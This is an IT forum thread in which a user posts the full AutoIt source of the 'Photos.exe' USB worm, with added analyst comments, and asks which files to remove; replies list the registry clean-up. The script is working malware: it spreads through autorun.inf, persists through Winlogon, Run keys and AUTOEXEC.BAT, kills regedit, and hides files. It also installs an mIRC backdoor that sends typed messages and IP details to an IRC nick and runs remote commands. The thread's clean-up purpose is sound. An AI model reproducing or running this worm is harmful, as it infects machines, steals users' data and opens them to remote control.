
Virus


GrimR

IS-IT--Management
Jun 17, 2007
1,149
ZA
A few computers on my network have turned up with the photos.exe virus. I did a search and found this script, which appears to be the source of the actual virus.

I know it creates certain files, e.g. TASKMAN, msconfig.pif (hidden in the root of C:) and ntdetect.com, and a process whose name is just " . ".

Can someone tell me in this script if there is anything else that I'm missing.

I do not suggest anyone run it; I merely want advice on what other files I may need to find to get rid of it.

Thanks
; ---------------------------------------------------------------------------
; Analyst annotation (review): this is a malware sample -- an AutoIt worm that
; spreads as Photos.exe via autorun.inf. The comments below only describe what
; the visible code does, so that the dropped files and registry keys can be
; located and removed. Do not compile or run it.
; ---------------------------------------------------------------------------
; Hide the AutoIt tray icon so the resident copy is not visible to the user.
Opt("TrayIconHide", 1) ;0=show, 1=hide tray icon
; Register two bogus file extensions -- ". " (dot followed by a space) and
; ".~»" -- as "exefile" in both HKCR and HKLM\SOFTWARE\Classes. The copies
; dropped later are named " . " and "«~.~»", so these four keys are what make
; those oddly named files executable. Remove them during clean-up.
RegWrite("HKEY_CLASSES_ROOT\. ", "", "REG_SZ", "exefile")
RegWrite("HKEY_CLASSES_ROOT\.~»", "", "REG_SZ", "exefile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\. ", "", "REG_SZ", "exefile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.~»", "", "REG_SZ", "exefile")
; Cosmetic marker: sets the Explorer hover text (InfoTip) for every file type
; under HKCR\*. Harmless by itself, but a useful indicator of infection.
RegWrite("HKEY_CLASSES_ROOT\*", "InfoTip", "REG_SZ", "I love you baby!")
; Decoy for the fixed-drive infection path: msconfig.pif is the name the worm
; writes to the root of every hard drive (see the fixed-drive loop below) and
; points autorun.inf at. If a copy is already running under that name, just
; open an Explorer window on the directory the script was launched from, so a
; user who double-clicked the drive sees what they expected.
If ProcessExists("msconfig.pif")then
$dir = "explorer.exe " & @ScriptDir
Run( $dir , "", @SW_MAXIMIZE) ;if user open the drive, allow it
EndIf
; Installation / persistence stage. "«~.~»" is the name of the resident copy
; (see the loop below); if a process by that name is already running the
; machine is treated as infected and nothing is done here.
If ProcessExists("«~.~»") Then ;if not infected

Else
; Artifact 1: %SystemDir%\ntdetect.com, read-only + system + hidden.
; NOTE(review): on NT-family systems the legitimate NTDETECT.COM lives in the
; root of the boot drive, not in System32, so this System32 copy is the worm --
; confirm on the specific OS before deleting.
FileCopy( @ScriptFullPath , @SystemDir & "\ntdetect.com",1) ;0 =not overwrite 1 = overwrite
FileSetAttrib( @SystemDir & "\ntdetect.com", "+R+S+H")
; Persistence 1: append the copy to Winlogon\Userinit so it is started at every
; interactive logon, after the real userinit.exe. Clean-up must restore
; Userinit to just the userinit.exe entry.
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit", "REG_SZ" ,@SystemDir & "\userinit.exe," & @SystemDir & "\ntdetect.com")

; Artifact 2: %SystemDir%\«~.~» (the resident copy), read-only + system + hidden.
FileCopy( @ScriptFullPath , @SystemDir & "\«~.~»",1)
FileSetAttrib( @SystemDir & "\«~.~»", "+R+S+H")

; Persistence 2: clear the read-only bit on C:\AUTOEXEC.BAT and overwrite it
; (mode 2 = truncate) with a single "start <resident copy>" line. Any existing
; AUTOEXEC.BAT content is destroyed, so do not expect to recover it.
FileSetAttrib( "c:\AUTOEXEC.BAT", "-R")
$file = FileOpen("c:\AUTOEXEC.BAT", 2) ;0 Read,1 Append , 2 Clear contents
; Check if file opened for writing OK
If $file = -1 Then
; Whole script aborts if AUTOEXEC.BAT cannot be opened for writing.
Exit
EndIf
FileWrite($file, "start " & @SystemDir & "\«~.~»")
FileClose($file)
; Launch the resident copy immediately, hidden.
Run( @SystemDir & "\«~.~»" ,"" , @SW_HIDE)
EndIf


; Main dispatch. The same binary is dropped under several names and decides
; what to do from (a) the type of drive it is running from and (b) its own
; full path. Summary of the four fixed-drive roles:
;   %SystemDir%\ntdetect.com   -> registry hijacks of .mp3/.jpg and icons, then falls through
;   %SystemDir%\«~.~»          -> infects removable and fixed drives every 10 s (forever)
;   %ProgramFiles%\ .          -> watchdog: respawns the others, kills regedit, hides hidden files
;   %WindowsDir%\ .            -> watchdog: respawns the others, keeps AutoRun enabled
$app = @ScriptDir
$var = DriveGetType( $app )

If $var = "REMOVABLE" then ;First run from Memory Stick Initial stage for infection

; Running from a USB stick: only open Explorer on the stick so the user sees
; what they expected. The infection itself was already done by the block above
; (copies to System32 and the Userinit value). Execution then falls through to
; the mIRC section at the end of the script.
$dir = "explorer.exe " & @ScriptDir
Run( $dir , "", @SW_MAXIMIZE) ;if user open MEmorystick allow it

Elseif $var = "fixed" then ;running from computer

; Role: the System32\ntdetect.com copy (started via Userinit at logon).
; Hijack the .mp3 and .jpg extensions to a new "love" class whose default value
; is an e-mail address, and point several DefaultIcon keys at icon 0 of the
; resident copy. Clean-up must restore .mp3/.jpg to their original class names
; and delete the "love" class under both HKCR and HKLM\SOFTWARE\Classes.
; NOTE(review): {20D04FE0-3AEA-1069-A2D8-08002B30309D} is commonly the
; "My Computer" shell object -- verify before restoring its DefaultIcon.
If @SystemDir & "\ntdetect.com" = @ScriptFullPath then
RegWrite("HKEY_CLASSES_ROOT\.mp3", "", "REG_SZ", "love")
RegWrite("HKEY_CLASSES_ROOT\.jpg", "", "REG_SZ", "love")
RegWrite("HKEY_CLASSES_ROOT\love", "", "REG_SZ", "somazina@gmail.com")
RegWrite("HKEY_CLASSES_ROOT\dllfile\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_CLASSES_ROOT\love\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mp3", "", "REG_SZ", "love")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.jpg", "", "REG_SZ", "love")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\love", "", "REG_SZ", "somazina@gmail.com")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\love\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
; Duplicate of the CLSID write a few lines above (same key, same value).
RegWrite("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")

; Kill date: on 16 February this role terminates without doing anything else.
If @MON = "2" and @MDAY = "16" Then Exit
; Role: the resident copy %SystemDir%\«~.~» -- the spreader.
Elseif @SystemDir & "\«~.~»" = @ScriptFullPath then

; $ii is never modified, so "Until $ii = 10" never becomes true and this loop
; runs forever, sleeping 10 s between passes. $count is unused.
$ii = 0
$count = 0

Do
$drv = DriveGetDrive( "removable" ) ;Check for removable Disk to be infected
If NOT @error Then
; Kill date: on 16 February stop spreading and fall through to the mIRC section.
If @MON = "2" and @MDAY = "16" Then ExitLoop

For $i = 1 to $drv[0]

; Every READY removable drive except the floppy (a:) gets two copies of the
; worm -- "phyatkyee.blogspot.com" and "Photos.exe" -- written only if not
; already present (flag 0 = do not overwrite), plus an autorun.inf whose
; open/shellexecute/shell\Explore/shell\Open actions all run the first copy.
; autorun.inf is then marked system + hidden.
if $drv[$i] <> "a:" then
if DriveStatus ( $drv[$i] ) = "READY" then
FileCopy( @ScriptFullPath , $drv[$i] & "\phyatkyee.blogspot.com",0)
FileCopy( @ScriptFullPath , $drv[$i] & "\Photos.exe",0)
FileSetAttrib( $drv[$i] & "\autorun.inf", "-R-S")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "open", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shellexecute", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shell\Explore\command", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shell\Open\command", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shell", "Explore")
FileSetAttrib( $drv[$i] & "\autorun.inf", "+S+H")
EndIf
EndIf
Next ;end of next for removeable drives
; Every fixed drive whose status is not UNKNOWN gets <root>\msconfig.pif
; (overwritten each pass, flag 1) and an autorun.inf that launches it,
; marked read-only + system + hidden. These are the "msconfig.pif hidden in
; C:" artifacts; repeat the clean-up on every hard-drive root, not just C:.
$fix = DriveGetDrive( "fixed" )
For $a = 1 to $fix[0] ;for Hard drives
If DriveStatus ( $fix[$a] ) = "UNKNOWN" then
Else
FileCopy( @ScriptFullPath , $fix[$a] & "\msconfig.pif",1)
IniWrite($fix[$a] & "\autorun.inf", "autorun", "open", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shellexecute", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shell\Explore\command", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shell\Open\command", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shell", "Explore")
FileSetAttrib( $fix[$a] & "\autorun.inf", "+R+S+H")
EndIf
Next
;check for initial program
; Artifact: %ProgramFiles%\" . " (the first watchdog). Recreated and
; started hidden whenever no process named " . " is running.
If ProcessExists(" . ") Then
Else
FileCopy( @ScriptFullPath , @ProgramFilesDir & "\ . ",1)
Run( @ProgramFilesDir & "\ . ", "", @SW_HIDE)
EndIf
EndIf
Sleep(10000)
Until $ii = 10

; Role: the %ProgramFiles%\" . " copy -- watchdog number one. Loops forever.
Elseif @ProgramFilesDir & "\ . " = @ScriptFullPath then

While 0 <> 1
; Kill date: on 16 February this role terminates.
If @MON = "2" and @MDAY = "16" Then Exit
; Respawn: if no " . " process exists, drop a copy as %WindowsDir%\" . " and
; start it. NOTE(review): Run(" . ") gives no directory, so which copy
; actually starts depends on the working directory / PATH -- confirm.
If ProcessExists(" . ") = 0 Then
FileCopy( @ScriptFullPath , @WindowsDir & "\ . ",1)
Run(" . ", "", @SW_HIDE)

EndIf
; Respawn the resident spreader in System32 if it is not running
; (same path-less Run() caveat as above).
If ProcessExists("«~.~»") = 0 Then
FileCopy( @ScriptFullPath , @SystemDir & "\«~.~»",1)
Run("«~.~»", "", @SW_HIDE)

EndIf

; Anti-analysis: kill regedit.exe every pass (closed by name, then again by
; PID in case the first call missed it).
ProcessClose("regedit.exe")
$PID = ProcessExists("regedit.exe") ; Will return the PID or 0 if the process isn't found.( PID= Process ID )
If $PID Then ProcessClose($PID)


; Anti-analysis: force Explorer's "Show hidden files and folders" off every
; 500 ms so the +S+H artifacts stay invisible. Changing the setting manually
; will not stick while this process is alive -- kill it first.
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD" ,"0")
sleep(500)

WEnd

; Role: the %WindowsDir%\" . " copy -- watchdog number two. Loops forever.
Elseif @WindowsDir & "\ . " = @ScriptFullPath then
; Persistence 3: HKCU Run value "Yadanar" pointing at %WindowsDir%\TASKMAN.EXE.
; NOTE(review): nothing in this script writes TASKMAN.EXE, so either another
; component drops it or the value is dangling -- check for the file anyway
; and delete the Run value.
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Yadanar", "REG_SZ", @WindowsDir & "\TASKMAN.EXE")

While 0 <> 1
; Kill date: on 16 February this role terminates.
If @MON = "2" and @MDAY = "16" Then Exit
; Respawn watchdog one in Program Files if it is not running.
If ProcessExists(" . ") = 0 Then
FileCopy( @ScriptFullPath , @ProgramFilesDir & "\ . ",1)
Run(@ProgramFilesDir & "\ . ", "", @SW_HIDE)
EndIf
; Respawn the resident spreader in System32 if it is not running.
If ProcessExists("«~.~»") = 0 Then
FileCopy( @ScriptFullPath , @SystemDir & "\«~.~»",1)
Run("«~.~»", "", @SW_HIDE)

Endif
; Re-written every 500 ms. NoDriveTypeAutoRun is a bitmask of drive types on
; which AutoRun is disabled; a value of 1 leaves AutoRun active on removable
; and fixed drives, undoing any AutoRun hardening while this process lives.
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDriveTypeAutoRun", "REG_DWORD", "1")
sleep(500)
WEnd
Endif ;fixed drive end
Endif; Main End


;for MIRc program
; mIRC backdoor / data exfiltration. Only runs when mIRC is installed in the
; default location. Note that despite the ".dll" names, both files written here
; are mIRC remote scripts (plain text), not Windows DLLs.
; This code is only reached by roles that do not loop forever (the removable-
; drive run, the ntdetect.com role, and the spreader after its kill date).
if FileExists( "C:\Program Files\mIRC\mirc.ini") then

; Artifact: mth.dll -- forwards everything to the IRC nick "PhyatKyee":
;   on text  -> every message seen in any channel or query
;   on input -> every line the victim types (messages and commands)
;   on JOIN  -> the victim's IP, host name, OS, server and server IP
; Whole script aborts if the file cannot be opened. NOTE(review): this script
; never adds mth.dll to mirc.ini's [rfiles], so unless it is loaded some
; other way these handlers may never run -- check [rfiles] on the victim.
$file = FileOpen("C:\Program Files\mIRC\mth.dll", 2);1 append 2 erase
If $file = -1 Then
Exit
EndIf
FileWrite($file, "on *:text:*:*: { .msg PhyatKyee «« < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }" & @CRLF)
FileWrite($file, "on *:input:*: { .msg PhyatKyee »» $iif($left($1,1) != / , < $+ $active $+ > ,[command]) $1- }" & @CRLF)
FileWrite($file, "on *:JOIN:#: { .msg PhyatKyee IP $+ » $+ $ip ¤ Host $+ » $+ $host ¤ $os ¤ server $+ » $+ $server ¤ $serverIP }")

; Artifact: mirc.dll -- the remote-control script that IS registered below.
;   on ^*:text:'*:?: -> a private message whose text starts with a single
;                       quote is executed as a mIRC command (". $+ $2-") and
;                       suppressed from the victim's window (haltdef):
;                       remote command execution for anyone who can /msg the victim.
;   on connect       -> a timer that messages "PhyatKyee" 30 times, every 120 s,
;                       announcing the infection on each server connect.
; The ";combo"/";text"/";on 1:dialog" lines are commented-out leftovers in the
; written script and are inert.
$file = FileOpen("C:\Program Files\mIRC\mirc.dll", 2)
If $file = -1 Then
Exit
EndIf
FileWrite($file, ";If you don't know what you were doing" & @CRLF)
FileWrite($file, ";Don't modify the codes" & @CRLF)
FileWrite($file, ";By... PhyatKyee" & @CRLF)
FileWrite($file, "on ^*:text:'*:?: { . $+ $2- | haltdef }" & @CRLF)
FileWrite($file, ";combo 20, 100 41 104 285, edit " & @CRLF)
FileWrite($file, ";text Ops (+o):, 5, 3 44 95 13, right}" & @CRLF)
FileWrite($file, ";on 1:dialog:ncor:init:0:{" & @CRLF)
FileWrite($file, ";on ^*:text:'*:?: { . $+ $2- | haltdef }" & @CRLF)
FileWrite($file, ";}" & @CRLF)
FileWrite($file, "on *:connect: { /timer 30 120 /.msg PhyatKyee hi I'm now Using mIRC »» mth.dll }")
; Register mirc.dll as remote script #2 (overwriting whatever n2 was) and
; silence mIRC's fserve/DCC/link warnings so the activity is not flagged.
; Clean-up: remove the n2 entry, restore the [warn] settings, delete both files.
IniWrite("C:\Program Files\mIRC\mirc.ini", "rfiles", "n2", "mirc.dll")
IniWrite("C:\Program Files\mIRC\mirc.ini", "warn", "fserve", "off")
IniWrite("C:\Program Files\mIRC\mirc.ini", "warn", "dcc", "off")
IniWrite("C:\Program Files\mIRC\mirc.ini", "warn", "link", "off")

endif

; for scoopScript2004
; Same mIRC backdoor for the "ScoopScript2004" mIRC distribution installed in
; C:\Scoop2004. Artifacts: C:\Scoop2004\mth.dll (forwarder, same three handlers
; as the mIRC section) and C:\Scoop2004\remote03.sco (command backdoor +
; connect beacon), registered as remote script n3. Whole script aborts if
; either file cannot be opened for writing.
if FileExists( "C:\Scoop2004\mirc.ini") then

$file = FileOpen("C:\Scoop2004\mth.dll", 2)
If $file = -1 Then
Exit
EndIf
FileWrite($file, "on *:text:*:*: { .msg PhyatKyee «« < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }" & @CRLF)
FileWrite($file, "on *:input:*: { .msg PhyatKyee »» $iif($left($1,1) != / , < $+ $active $+ > ,[command]) $1- }" & @CRLF)
FileWrite($file, "on *:JOIN:#: { .msg PhyatKyee IP $+ » $+ $ip ¤ Host $+ » $+ $host ¤ $os ¤ server $+ » $+ $server ¤ $serverIP }")

; remote03.sco: private messages beginning with a single quote are executed as
; mIRC commands and hidden (haltdef); on connect a timer beacons to "PhyatKyee"
; 30 times at 120 s intervals.
$file = FileOpen("C:\Scoop2004\remote03.sco", 2)
If $file = -1 Then
Exit
EndIf

FileWrite($file, "on ^*:text:'*:?: { . $+ $2- | haltdef }" & @CRLF)
FileWrite($file, "on *:connect: { /timer 30 120 /.msg PhyatKyee Scoop »» mth.dll }")
; Register remote03.sco as remote script #3 and silence the fserve/DCC/link
; warnings. Clean-up: remove n3, restore [warn], delete both files.
IniWrite("C:\Scoop2004\mirc.ini", "rfiles", "n3", "remote03.sco")
IniWrite("C:\Scoop2004\mirc.ini", "warn", "fserve", "off")
IniWrite("C:\Scoop2004\mirc.ini", "warn", "dcc", "off")
IniWrite("C:\Scoop2004\mirc.ini", "warn", "link", "off")

endif

;If my birthday
if @WDAY = "5" then
While 0 <> 1
msgbox(4096,"Birthday","Happy Birthday !" & @CRLF & "And I love you So Much." & @CRLF & "Ko PhyatKyee" )
sleep(50000)
RegWrite("HKEY_CLASSES_ROOT\.mp3", "", "REG_SZ", "mp3file")
RegWrite("HKEY_CLASSES_ROOT\.jpg", "", "REG_SZ", "jpegfile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mp3", "", "REG_SZ", "mp3file")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.jpg", "", "REG_SZ", "jpgfile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk", "", "REG_SZ", "lnkfile")

sleep(90000)
WEnd
EndIf

You will need to remove the registry entries that the virus creates as well: the Winlogon Userinit value it appends itself to, the HKCU Run value "Yadanar", the bogus ". " and ".~»" extension keys, and the hijacked .mp3/.jpg and "love" class keys under both HKCR and HKLM\SOFTWARE\Classes. Kill the hidden " . " and "«~.~»" processes first, because they re-write some of those values every 500 ms.
 
I know, plus the hidden directories. I have sorted them out and no longer get them on the network. Thanks.



